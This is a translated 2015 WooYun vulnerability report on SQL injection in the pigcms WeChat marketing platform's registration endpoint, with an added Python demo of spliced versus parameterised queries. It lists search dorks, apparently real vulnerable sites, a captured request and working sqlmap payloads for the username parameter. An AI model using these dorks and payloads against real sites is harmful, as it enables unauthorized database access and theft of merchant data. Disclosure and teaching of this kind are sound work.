Vulnerability summary

Defect ID: wooyun-2015-0100388

Title: pigcms WeChat public-account marketing platform generic SQL injection vulnerability

Vendor: pigcms

Author: 路人甲

Submitted: 2015-03-10 13:55

Fixed: 2015-04-30 18:48

Published: 2015-04-30 18:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 13

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-04-30: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Generic SQL injection vulnerability in a WeChat public-account marketing platform

Detailed description:

See the WooYun report "某通用型微信公众平台SQL注入(泄露上万商家信息)" (a generic WeChat public-platform SQL injection leaking tens of thousands of merchants' records); this one is a leftover spot picked up from that report!
Search keywords: inurl:index.php?g=Home&m=Index&a=help
intitle:营销系统 inurl:login
Vulnerable location: index.php?m=Index&a=reg (the registration page; the injectable request is the POST to index.php?m=Users&a=checkreg that this page issues)


Proof of vulnerability:

Borrowing the earlier report's cases:
http://a.t2.weixinbiz.cn/
http://www.weixint.com/
http://wechat.dahailuo.com/
http://www.hohoxj.com/
http://guphoto.xf.sc.cn/
http://www.jpsbzr.com/
http://weixin.kfqd.cn/
http://www.iweichat.com/
http://www.macheka.cn/
http://liemei.cedb.com/
Taking http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg as the example:
Test data; captured request:

POST /index.php?m=Users&a=checkreg HTTP/1.1
Host: a.t2.weixinbiz.cn
Proxy-Connection: keep-alive
Content-Length: 151
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://a.t2.weixinbiz.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CNZZDATA5524076=cnzz_eid%3D2057590716-1425359086-http%253A%252F%252Fa.t2.weixinbiz.cn%252F%26ntime%3D1425359086; PHPSESSID=97d8b8f0cfa07313d01299087bc5760f; AJSTAT_ok_pages=2; AJSTAT_ok_times=2
username=admin%27&password=123456&repassword=123456&email=212312313%40qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_ba74dd678a656f8ee0b8e7223ce58417
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=admin') RLIKE IF(8823=8823,0x61646d696e,0x28) AND ('WwRy'='WwRy&password=123456&repassword=123456&[email protected]&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin') AND (SELECT 8242 FROM(SELECT COUNT(*),CONCAT(0x3a7976633a,(SELECT (CASE WHEN (8242=8242) THEN 1 ELSE 0 END)),0x3a78716d3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yWZv'='yWZv&password=123456&repassword=123456&[email protected]&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=admin') AND SLEEP(5) AND ('afwa'='afwa&password=123456&repassword=123456&[email protected]&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9
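Every sqlmap payload above opens with `admin')` and closes with `AND ('x'='x`, so the submitted username lands inside a parenthesised, single-quoted comparison and the injected condition is evaluated by the database. In the RLIKE probe the hex constants decode to `0x61646d696e` = `admin` and `0x28` = `(`: when the condition is true the column is matched against a harmless regex, when false against an invalid one, and the resulting error is what lets sqlmap tell the two outcomes apart. The following is an added example and is not code from this page or from pigcms. It models that query shape in Python against an in-memory SQLite table (the table and column names, and the exact statement, are assumptions inferred from the payload framing), shows the string-spliced handler beside a bound-parameter one, and runs the same two checks the report relied on against each: the lone quote, and a true/false boolean pair. SQLite has no RLIKE or SLEEP, so the pair uses `1=1` / `1=2` instead of the MySQL-specific conditions.

```python
import sqlite3


# Constructed in-memory stand-in for the platform's user table. The table and
# column names are assumptions: the page only shows the `username` POST
# parameter and the `')` / `('x'='x` framing in sqlmap's payloads.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, created TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "2015-03-01"), ("alice", "2015-03-02")],
    )
    return con


def vulnerable_checkreg(con, username):
    """Unsafe pattern (hypothetical reconstruction): the POST value is spliced
    into the SQL text. The parentheses reproduce the quote context that the
    payloads `admin') ... AND ('x'='x` close and then reopen."""
    sql = "SELECT COUNT(*) FROM users WHERE (username='%s')" % username
    return con.execute(sql).fetchone()[0]


def safe_checkreg(con, username):
    """Hardened form: the value is bound as a parameter, so whatever it
    contains is compared as data and cannot change the statement."""
    sql = "SELECT COUNT(*) FROM users WHERE (username=?)"
    return con.execute(sql, (username,)).fetchone()[0]


def quote_causes_error(check):
    """First step of the report: submit username=admin' and see whether the
    handler chokes. Returns True when the lone quote breaks the query."""
    try:
        check("admin'")
    except sqlite3.Error:
        return True
    return False


def boolean_blind_probe(check):
    """Boolean-based blind test in the style of the sqlmap finding: wrap a
    true and a false condition in the same prefix/suffix and report whether
    the observable result differs. `check` maps a username string to an
    observable (here the count the handler returns). True means the injected
    condition reached the database."""
    true_payload = "admin') AND 1=1 AND ('a'='a"
    false_payload = "admin') AND 1=2 AND ('a'='a"
    return check(true_payload) != check(false_payload)


if __name__ == "__main__":
    con = make_db()
    for name, handler in (("spliced", vulnerable_checkreg), ("bound", safe_checkreg)):
        check = lambda u, h=handler: h(con, u)
        print(name, "quote error:", quote_causes_error(check),
              "boolean blind:", boolean_blind_probe(check))
```

Against the spliced handler the lone quote raises a syntax error and the true/false pair returns different counts (1 and 0), which is exactly the difference a blind technique keys on; the bound-parameter version returns 0 for every probe because the whole payload is looked up as a (nonexistent) username. Note that the registration form's `__hash__` token is present in every captured payload: a per-form CSRF token does nothing against injection once the request is sent with a valid token.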


Database information: (screenshot not preserved)


The other sites are the same as above!

Fix recommendation:

As above.

Copyright notice: please credit the source when reposting: 路人甲@WooYun


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report